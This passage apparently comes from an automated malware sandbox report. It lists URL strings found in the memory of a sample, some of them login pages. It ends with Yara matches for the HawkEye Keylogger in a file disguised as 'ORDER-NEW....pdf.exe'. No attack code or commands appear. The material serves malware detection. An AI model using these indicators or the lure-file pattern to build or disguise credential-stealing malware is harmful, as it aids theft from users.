              Source: bhvF129.tmp.8.drString found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcRXMqY1lU5NXqI7H2QRWgHFAYTsfVdew3_6QMhtv0g&s=10
              Source: bhvF129.tmp.8.drString found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcRZaO1x4iyU-YgxgvuerXdFmXdj8Ce3rNy8Mqw2SlqePXDg
              Source: bhvF129.tmp.8.drString found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcRlHYHZu1FxxbUNbpii9NbSF3wy4srqmfLAOC-QBxw&s
              Source: bhvF129.tmp.8.drString found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcS2yfg_cFEuqKFbNZCaFykqy-jW3vHyGM224t0Sov33iXvh
              Source: bhvF129.tmp.8.drString found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcS7Tsy61sPGCiV6yILYtCYyP2q9i9bHmXBPqktk0xQvTH0l
              Source: bhvF129.tmp.8.drString found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcS9bnSRFZj9kLnT0CeZ7r27C9IrO3sFLnQL62gz&s=0
              Source: bhvF129.tmp.8.drString found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcSHEjIxVJou5NRecC2n_FnHaUJDfppR3IDOglu2Ry9INoxt
              Source: bhvF129.tmp.8.drString found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcSKx7_Dt9K5OFgp-raiLw2XdVNOTbR27N_DCL6T8VDVN_16
              Source: bhvF129.tmp.8.drString found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcSTkM_f5rN2hSSg3E_UshkUpgZ0a66Lz0rF6gF6&s=0
              Source: bhvF129.tmp.8.drString found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcScI5035wSfgyvpN8fX27BnFHfF4a7I8z7Xlm7v&s=0
              Source: bhvF129.tmp.8.drString found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcSpNsTsg--kCoAxXjTvRrABIfJjd5ITzVx14ODQUC4wDGzB
              Source: bhvF129.tmp.8.drString found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcSrCEL2r-B2oHHnS0EeiVjQLJYayeF4GHjCZod9vr4&s
              Source: bhvF129.tmp.8.drString found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcSvX77JsybkskW6WoLj5kY6exJKuOkXoRWSsNgJbFY&s
              Source: bhvF129.tmp.8.drString found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcT9-gm37CbSVQ1QMRdyqOvdY12lHBO7fXpaqZZqKP2Wbjr2
              Source: bhvF129.tmp.8.drString found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTKoe8A2_V1bWtOlP5fx10ZdjsJZv6l2_sKjTp6jVAPnp0g
              Source: bhvF129.tmp.8.drString found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcThUknsbAksExwESRgK7TW5ujPLzgeGDT0-A3f5a1XrdyR-
              Source: bhvF129.tmp.8.drString found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTo0t2j428kWHZlc2etqXbsI-zLrpgSp87E2H24&s=0
              Source: bhvF129.tmp.8.drString found in binary or memory: https://fonts.googleapis.com/css?family=Google
              Source: bhvF129.tmp.8.drString found in binary or memory: https://fonts.gstatic.com/s/googlesans/v14/4UabrENHsxJlGDuGo1OIlLU94YtzCwA.woff
              Source: bhvF129.tmp.8.drString found in binary or memory: https://fonts.gstatic.com/s/googlesans/v16/4UaGrENHsxJlGDuGo1OIlI3K.woff
              Source: bhvF129.tmp.8.drString found in binary or memory: https://fonts.gstatic.com/s/googlesans/v16/4UabrENHsxJlGDuGo1OIlLU94bt3.woff
              Source: bhvF129.tmp.8.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v18/KFOlCnqEu92Fr1MmEU9fBBc-.woff
              Source: bhvF129.tmp.8.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v18/KFOlCnqEu92Fr1MmSU5fBBc-.woff
              Source: bhvF129.tmp.8.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v18/KFOlCnqEu92Fr1MmWUlfBBc-.woff
              Source: bhvF129.tmp.8.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v18/KFOmCnqEu92Fr1Mu4mxM.woff
              Source: bhvF129.tmp.8.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v20/KFOlCnqEu92Fr1MmEU9vAA.woff
              Source: bhvF129.tmp.8.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v20/KFOmCnqEu92Fr1Me5g.woff
              Source: bhvF129.tmp.8.drString found in binary or memory: https://fp.msedge.net/conf/v1/asgw/fpconfig.min.json
              Source: bhvF129.tmp.8.drString found in binary or memory: https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location
              Source: bhvF129.tmp.8.drString found in binary or memory: https://googleads.g.doubleclick.net/adsid/google/si?gadsid=AORoGNQXwBwQrE_SUsnWzwpadcOOdc8yOg6JxthQN
              Source: bhvF129.tmp.8.drString found in binary or memory: https://googleads.g.doubleclick.net/adsid/google/si?gadsid=AORoGNTXuGHPo1zFjYPXt7mTG-4GALGGk8bjqjvBm
              Source: bhvF129.tmp.8.drString found in binary or memory: https://googleads.g.doubleclick.net/adsid/google/ui?gadsid=AORoGNQP1yCl9r5iywZTFTjpazv-DURVxDidzMfrF
              Source: bhvF129.tmp.8.drString found in binary or memory: https://googleads.g.doubleclick.net/adsid/google/ui?gadsid=AORoGNSrZsXAj6n_sYvivJecwrpYgMhb9ihVGAlz2
              Source: bhvF129.tmp.8.drString found in binary or memory: https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml
              Source: bhvF129.tmp.8.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE1Mu3b?ver=5c31
              Source: bhvF129.tmp.8.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4DnuZ
              Source: bhvF129.tmp.8.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4Dnv6
              Source: bhvF129.tmp.8.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4Dnwt
              Source: bhvF129.tmp.8.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4DsDH
              Source: bhvF129.tmp.8.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FBmQ
              Source: bhvF129.tmp.8.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FBmV
              Source: bhvF129.tmp.8.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FBmZ
              Source: bhvF129.tmp.8.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FGwC
              Source: bhvF129.tmp.8.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4n1yl
              Source: bhvF129.tmp.8.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4n4cm
              Source: bhvF129.tmp.8.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ncJ7
              Source: bhvF129.tmp.8.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ncJa
              Source: bhvF129.tmp.8.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4nqTh
              Source: bhvF129.tmp.8.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4sQww?ver=37ff
              Source: bhvF129.tmp.8.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tD2S
              Source: bhvF129.tmp.8.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tG3O
              Source: bhvF129.tmp.8.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tIoW
              Source: bhvF129.tmp.8.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tIoY
              Source: bhvF129.tmp.8.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tKUA
              Source: bhvF129.tmp.8.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tMOD
              Source: bhvF129.tmp.8.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tMOM
              Source: bhvF129.tmp.8.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tQVa
              Source: bhvF129.tmp.8.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4u1kF
              Source: bhvF129.tmp.8.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ubMD
              Source: bhvF129.tmp.8.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4wqj5
              Source: bhvF129.tmp.8.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4zuiC
              Source: bhvF129.tmp.8.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RWeTGO?ver=8c74&q=90&m=
              Source: bhvF129.tmp.8.drString found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
              Source: bhvF129.tmp.8.drString found in binary or memory: https://lh5.googleusercontent.com/p/AF1QipOcdIDtTfqJElTfRhjdFP9dPcYlW61iEhrydiuX=w92-h92-n-k-no
              Source: bhvF129.tmp.8.drString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
              Source: bhvF129.tmp.8.drString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
              Source: vbc.exeString found in binary or memory: https://login.yahoo.com/config/login
              Source: bhvF129.tmp.8.drString found in binary or memory: https://logincdn.msauth.net/16.000.28230.00/ConvergedLoginPaginatedStrings.en.js
              Source: bhvF129.tmp.8.drString found in binary or memory: https://logincdn.msauth.net/16.000.28230.00/ConvergedLogin_PCore.js
              Source: bhvF129.tmp.8.drString found in binary or memory: https://logincdn.msauth.net/16.000.28230.00/Converged_v21033.css
              Source: bhvF129.tmp.8.drString found in binary or memory: https://logincdn.msauth.net/16.000.28230.00/MeControl.js
              Source: bhvF129.tmp.8.drString found in binary or memory: https://logincdn.msauth.net/16.000.28230.00/images/ellipsis_white.svg?x=5ac590ee72bfe06a7cecfd75b588
              Source: bhvF129.tmp.8.drString found in binary or memory: https://logincdn.msauth.net/16.000.28230.00/images/microsoft_logo.svg?x=ee5c8d9fb6248c938fd0dc19370e
              Source: bhvF129.tmp.8.drString found in binary or memory: https://logincdn.msauth.net/16.000.28666.10/content/images/ellipsis_grey_2b5d393db04a5e6e1f739cb266e
              Source: bhvF129.tmp.8.drString found in binary or memory: https://logincdn.msauth.net/16.000.28666.10/content/images/ellipsis_white_5ac590ee72bfe06a7cecfd75b5
              Source: bhvF129.tmp.8.drString found in binary or memory: https://logincdn.msauth.net/16.000.28666.10/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc1937
              Source: bhvF129.tmp.8.drString found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v21033_-0mnSwu67knBd7qR7YN9GQ2.css
              Source: bhvF129.tmp.8.drString found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en_5QoHC_ilFOmb96M0pIeJ
              Source: bhvF129.tmp.8.drString found in binary or memory: https://logincdn.msauth.net/16.000/content/js/OldConvergedLogin_PCore_xqcDwEKeDux9oCNjuqEZ-A2.js
              Source: bhvF129.tmp.8.drString found in binary or memory: https://maps.windows.com/windows-app-web-link
              Source: bhvF129.tmp.8.drString found in binary or memory: https://mem.gfx.ms/me/MeControl/10.19168.0/en-US/meBoot.min.js
              Source: bhvF129.tmp.8.drString found in binary or memory: https://mem.gfx.ms/me/MeControl/10.19168.0/en-US/meCore.min.js
              Source: bhvF129.tmp.8.drString found in binary or memory: https://mem.gfx.ms/meversion?partner=RetailStore2&market=en-us&uhf=1
              Source: bhvF129.tmp.8.drString found in binary or memory: https://mwf-service.akamaized.net/mwf/css/bundle/1.57.0/west-european/default/mwf-main.min.css
              Source: bhvF129.tmp.8.drString found in binary or memory: https://mwf-service.akamaized.net/mwf/js/bundle/1.57.0/mwf-auto-init-main.var.min.js
              Source: vbc.exe, 00000008.00000003.712390571.00000000022AF000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.712341279.00000000022A2000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.712199419.00000000022A2000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.712142150.00000000022A2000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.712293496.00000000022A2000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.711936953.00000000022B7000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.711967368.00000000022A2000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.712232690.00000000022A2000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.712081309.00000000022A2000.00000004.00000001.sdmp, bhvF129.tmp.8.drString found in binary or memory: https://ogs.google.com/widget/callout?prid=19020392&pgid=19020380&puid=93eb0881ae9ec1db&origin=https
              Source: bhvF129.tmp.8.drString found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2019-06-26-21-10-17/PreSignInSettingsConfig.json
              Source: bhvF129.tmp.8.drString found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2019-06-26-21-10-17/PreSignInSettingsConfig.json?One
              Source: bhvF129.tmp.8.drString found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2020-07-22-21-45-19/PreSignInSettingsConfig.json?One
              Source: bhvF129.tmp.8.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/19.086.0502.0006/OneDriveSetup.exe
              Source: bhvF129.tmp.8.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/19.103.0527.0003/update1.xml?OneDriveUpdate=d580ab8fe35aabd7f368aa
              Source: bhvF129.tmp.8.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/20.124.0621.0006/update1.xml?OneDriveUpdate=285df6c9c501a160c7a24c
              Source: bhvF129.tmp.8.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/20.124.0621.0006/update1.xml?OneDriveUpdate=4a941ab240f8b2c5ca3ca1
              Source: bhvF129.tmp.8.drString found in binary or memory: https://onecs-live.azureedge.net/api/settings/en-US/xml/settings-tipset?release=rs4
              Source: bhvF129.tmp.8.drString found in binary or memory: https://optanon.blob.core.windows.net/skins/4.1.0/default_flat_top_two_button_black/v2/css/optanon.c
              Source: bhvF129.tmp.8.drString found in binary or memory: https://optanon.blob.core.windows.net/skins/4.1.0/default_flat_top_two_button_black/v2/images/cookie
              Source: bhvF129.tmp.8.drString found in binary or memory: https://pki.goog/repository/0
              Source: bhvF129.tmp.8.drString found in binary or memory: https://play.google.com/intl/en_us/badges/images/generic/de_badge_web_generic.png
              Source: bhvF129.tmp.8.drString found in binary or memory: https://policies.yahoo.com/w3c/p3p.xml
              Source: bhvF129.tmp.8.drString found in binary or memory: https://prod-video-cms-rt-microsoft-com.akamaized.net/vhs/api/videos/RE4sQBc
              Source: bhvF129.tmp.8.drString found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
              Source: bhvF129.tmp.8.drString found in binary or memory: https://s.yimg.com/lo/api/res/1.2/BXjlWewXmZ47HeV5NPvUYA--~A/Zmk9ZmlsbDt3PTYyMjtoPTM2ODthcHBpZD1nZW1
              Source: bhvF129.tmp.8.drString found in binary or memory: https://srtb.msn.com/auction?a=de-ch&b=28e3747a031f4b2a8498142b7c961529&c=MSN&d=http%3A%2F%2Fwww.msn
              Source: bhvF129.tmp.8.drString found in binary or memory: https://ssl.gstatic.com/gb/images/i1_1967ca6a.png
              Source: bhvF129.tmp.8.drString found in binary or memory: https://statics-marketingsites-neu-ms-com.akamaized.net/statics/override.css?c=7
              Source: bhvF129.tmp.8.drString found in binary or memory: https://www.digicert.com/CPS0
              Source: bhvF129.tmp.8.drString found in binary or memory: https://www.google-analytics.com/analytics.js
              Source: bhvF129.tmp.8.drString found in binary or memory: https://www.google-analytics.com/gtm/js?id=GTM-N7S69J3&cid=993498051.1601450642
              Source: bhvF129.tmp.8.drString found in binary or memory: https://www.google.com/
              Source: bhvF129.tmp.8.drString found in binary or memory: https://www.google.com/?gws_rd=ssl
              Source: vbc.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
              Source: bhvF129.tmp.8.drString found in binary or memory: https://www.google.com/async/bgasy?ei=gTJ0X7zPLY2f1fAPlo2xoAI&yv=3&async=_fmt:jspb
              Source: bhvF129.tmp.8.drString found in binary or memory: https://www.google.com/chrome/static/css/main.v2.min.css
              Source: bhvF129.tmp.8.drString found in binary or memory: https://www.google.com/chrome/static/css/main.v3.min.css
              Source: bhvF129.tmp.8.drString found in binary or memory: https://www.google.com/chrome/static/images/app-store-download.png
              Source: bhvF129.tmp.8.drString found in binary or memory: https://www.google.com/chrome/static/images/chrome-logo.svg
              Source: bhvF129.tmp.8.drString found in binary or memory: https://www.google.com/chrome/static/images/chrome_throbber_fast.gif
              Source: bhvF129.tmp.8.drString found in binary or memory: https://www.google.com/chrome/static/images/cursor-replay.cur
              Source: bhvF129.tmp.8.drString found in binary or memory: https://www.google.com/chrome/static/images/download-browser/big_pixel_phone.png
              Source: bhvF129.tmp.8.drString found in binary or memory: https://www.google.com/chrome/static/images/download-browser/pixel_phone.png
              Source: bhvF129.tmp.8.drString found in binary or memory: https://www.google.com/chrome/static/images/download-browser/pixel_tablet.png
              Source: bhvF129.tmp.8.drString found in binary or memory: https://www.google.com/chrome/static/images/fallback/google-chrome-logo.jpg
              Source: bhvF129.tmp.8.drString found in binary or memory: https://www.google.com/chrome/static/images/fallback/google-logo-one-color.jpg
              Source: bhvF129.tmp.8.drString found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-fb.jpg
              Source: bhvF129.tmp.8.drString found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-help.jpg
              Source: bhvF129.tmp.8.drString found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-twitter.jpg
              Source: bhvF129.tmp.8.drString found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-youtube.jpg
              Source: bhvF129.tmp.8.drString found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png
              Source: bhvF129.tmp.8.drString found in binary or memory: https://www.google.com/chrome/static/images/google-play-download.png
              Source: bhvF129.tmp.8.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-beta.png
              Source: bhvF129.tmp.8.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-canary.png
              Source: bhvF129.tmp.8.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-dev.png
              Source: bhvF129.tmp.8.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-enterprise.png
              Source: bhvF129.tmp.8.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/hero-anim-bottom-left.png
              Source: bhvF129.tmp.8.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/hero-anim-middle.png
              Source: bhvF129.tmp.8.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/hero-anim-top-right.png
              Source: bhvF129.tmp.8.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/homepage_features.png
              Source: bhvF129.tmp.8.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/homepage_privacy.png
              Source: bhvF129.tmp.8.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/homepage_tools.png
              Source: bhvF129.tmp.8.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/laptop_desktop.png
              Source: bhvF129.tmp.8.drString found in binary or memory: https://www.google.com/chrome/static/images/thank-you/thankyou-animation.json
              Source: bhvF129.tmp.8.drString found in binary or memory: https://www.google.com/chrome/static/js/installer.min.js
              Source: bhvF129.tmp.8.drString found in binary or memory: https://www.google.com/chrome/static/js/main.v2.min.js
              Source: bhvF129.tmp.8.drString found in binary or memory: https://www.google.com/complete/search?q&cp=0&client=psy-ab&xssi=t&gs_ri=gws-wiz&hl=en&authuser=0&pq
              Source: bhvF129.tmp.8.drString found in binary or memory: https://www.google.com/complete/search?q&cp=0&client=psy-ab&xssi=t&gs_ri=gws-wiz&hl=en&authuser=0&ps
              Source: bhvF129.tmp.8.drString found in binary or memory: https://www.google.com/complete/search?q=c&cp=1&client=psy-ab&xssi=t&gs_ri=gws-wiz&hl=en&authuser=0&
              Source: bhvF129.tmp.8.drString found in binary or memory: https://www.google.com/complete/search?q=ch&cp=2&client=psy-ab&xssi=t&gs_ri=gws-wiz&hl=en&authuser=0
              Source: bhvF129.tmp.8.drString found in binary or memory: https://www.google.com/complete/search?q=chr&cp=3&client=psy-ab&xssi=t&gs_ri=gws-wiz&hl=en&authuser=
              Source: bhvF129.tmp.8.drString found in binary or memory: https://www.google.com/complete/search?q=chro&cp=4&client=psy-ab&xssi=t&gs_ri=gws-wiz&hl=en&authuser
              Source: bhvF129.tmp.8.drString found in binary or memory: https://www.google.com/complete/search?q=chrom&cp=5&client=psy-ab&xssi=t&gs_ri=gws-wiz&hl=en&authuse
              Source: bhvF129.tmp.8.drString found in binary or memory: https://www.google.com/complete/search?q=chrome&cp=6&client=psy-ab&xssi=t&gs_ri=gws-wiz&hl=en&authus
              Source: bhvF129.tmp.8.drString found in binary or memory: https://www.google.com/favicon.ico
              Source: bhvF129.tmp.8.drString found in binary or memory: https://www.google.com/images/branding/googlelogo/2x/googlelogo_color_272x92dp.png
              Source: bhvF129.tmp.8.drString found in binary or memory: https://www.google.com/images/branding/googlelogo/2x/googlelogo_color_92x30dp.png
              Source: bhvF129.tmp.8.drString found in binary or memory: https://www.google.com/images/hpp/Chrome_Owned_96x96.png
              Source: bhvF129.tmp.8.drString found in binary or memory: https://www.google.com/images/icons/material/system/1x/email_grey600_24dp.png
              Source: bhvF129.tmp.8.drString found in binary or memory: https://www.google.com/images/nav_logo299.png
              Source: bhvF129.tmp.8.drString found in binary or memory: https://www.google.com/images/phd/px.gif
              Source: bhvF129.tmp.8.drString found in binary or memory: https://www.google.com/images/searchbox/desktop_searchbox_sprites302_hr.png
              Source: bhvF129.tmp.8.drString found in binary or memory: https://www.google.com/intl/en_uk/chrome/
              Source: bhvF129.tmp.8.drString found in binary or memory: https://www.google.com/intl/en_uk/chrome/application/x-msdownloadC:
              Source: bhvF129.tmp.8.drString found in binary or memory: https://www.google.com/intl/en_uk/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrows
              Source: bhvF129.tmp.8.drString found in binary or memory: https://www.google.com/js/bg/4sIGg4Q0MrxdMwjTwsyJBGUAZbljSmH8-8Fa9_hVOC0.js
              Source: bhvF129.tmp.8.drString found in binary or memory: https://www.google.com/search
              Source: bhvF129.tmp.8.drString found in binary or memory: https://www.google.com/search?source=hp&ei=djJ0X6TKCL6IjLsPqriogAY&q=chrome&oq=chrome&gs_lcp=CgZwc3k
              Source: vbc.exe, 00000008.00000003.712390571.00000000022AF000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.712341279.00000000022A2000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.712199419.00000000022A2000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.712142150.00000000022A2000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.712293496.00000000022A2000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.711936953.00000000022B7000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.711967368.00000000022A2000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.712232690.00000000022A2000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.712081309.00000000022A2000.00000004.00000001.sdmp, bhvF129.tmp.8.drString found in binary or memory: https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=&ved=2ahUKEwj8k7G9rJDsAhWNTxUIHZZGDCQQ
              Source: bhvF129.tmp.8.drString found in binary or memory: https://www.google.com/xjs/_/js/k=xjs.s.en_GB.u8fwEfmm86E.O/ck=xjs.s.hyRG9kR79v8.L.I11.O/am=AAAAAABA
              Source: bhvF129.tmp.8.drString found in binary or memory: https://www.google.com/xjs/_/js/k=xjs.s.en_GB.u8fwEfmm86E.O/ck=xjs.s.hyRG9kR79v8.L.I11.O/m=IvlUe
              Source: bhvF129.tmp.8.drString found in binary or memory: https://www.googleadservices.com/pagead/conversion.js
              Source: bhvF129.tmp.8.drString found in binary or memory: https://www.googleadservices.com/pagead/conversion_async.js
              Source: bhvF129.tmp.8.drString found in binary or memory: https://www.googleadservices.com/pagead/p3p.xml
              Source: bhvF129.tmp.8.drString found in binary or memory: https://www.googletagmanager.com/gtm.js?id=GTM-PZ6TRJB
              Source: bhvF129.tmp.8.drString found in binary or memory: https://www.gstatic.com/_/mss/boq-identity/_/js/k=boq-identity.ConsentUi.en_GB.wmTUy5P6FUM.es5.O/ck=
              Source: bhvF129.tmp.8.drString found in binary or memory: https://www.gstatic.com/_/mss/boq-one-google/_/js/k=boq-one-google.OneGoogleWidgetUi.en.bMYZ6MazNlM.
              Source: bhvF129.tmp.8.drString found in binary or memory: https://www.gstatic.com/ac/cb/cb_cbu_kickin.svg
              Source: bhvF129.tmp.8.drString found in binary or memory: https://www.gstatic.com/external_hosted/autotrack/autotrack.js
              Source: bhvF129.tmp.8.drString found in binary or memory: https://www.gstatic.com/external_hosted/lottie/lottie.js
              Source: bhvF129.tmp.8.drString found in binary or memory: https://www.gstatic.com/external_hosted/modernizr/modernizr.js
              Source: bhvF129.tmp.8.drString found in binary or memory: https://www.gstatic.com/external_hosted/scrollmagic/ScrollMagic.min.js
              Source: bhvF129.tmp.8.drString found in binary or memory: https://www.gstatic.com/external_hosted/scrollmagic/animation.gsap.min.js
              Source: bhvF129.tmp.8.drString found in binary or memory: https://www.gstatic.com/images/branding/googlelogo/1x/googlelogo_color_92x36dp.png
              Source: bhvF129.tmp.8.drString found in binary or memory: https://www.gstatic.com/images/icons/material/system/1x/check_black_24dp.png
              Source: bhvF129.tmp.8.drString found in binary or memory: https://www.gstatic.com/images/icons/material/system/1x/keyboard_arrow_down_grey600_24dp.png
              Source: bhvF129.tmp.8.drString found in binary or memory: https://www.gstatic.com/kpui/social/fb_32x32.png
              Source: bhvF129.tmp.8.drString found in binary or memory: https://www.gstatic.com/kpui/social/twitter_32x32.png
              Source: bhvF129.tmp.8.drString found in binary or memory: https://www.gstatic.com/og/_/js/k=og.og2.en_US.vA2d_upwXfg.O/rt=j/m=def
              Source: bhvF129.tmp.8.drString found in binary or memory: https://www.gstatic.com/og/_/js/k=og.qtm.en_US.LGkrjG2a9yI.O/rt=j/m=qabr
              Source: bhvF129.tmp.8.drString found in binary or memory: https://www.gstatic.com/og/_/ss/k=og.qtm.CniBF78B8Ew.L.X.O/m=qcwid/excm=qaaw
              Source: bhvF129.tmp.8.drString found in binary or memory: https://www.gstatic.com/ui/v1/activityindicator/loading_24.gif
              Source: vbc.exe, 00000008.00000003.712462189.00000000022AF000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.712423496.00000000022B7000.00000004.00000001.sdmp, bhvF129.tmp.8.drString found in binary or memory: https://www.msn.com/
              Source: bhvF129.tmp.8.drString found in binary or memory: https://www.msn.com/spartan/dhp?locale=en-US&market=US&enableregulatorypsm=0&enablecpsm=0&ishostisol

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              barindex
              Yara detected HawkEye Keylogger
              Source: Yara matchFile source: 0.0.ORDER-NEW....pdf.exe.4a73c3c.19.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.0.ORDER-NEW....pdf.exe.5af10f4.12.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.0.AppLaunch.exe.400000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.0.AppLaunch.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.0.ORDER-NEW....pdf.exe.4afe15c.9.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.0.ORDER-NEW....pdf.exe.4afe15c.20.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.0.ORDER-NEW....pdf.exe.49e970c.8.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.ORDER-NEW....pdf.exe.49e970c.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.0.ORDER-NEW....pdf.exe.4afe15c.9.unpack, type: UNPACKEDPE
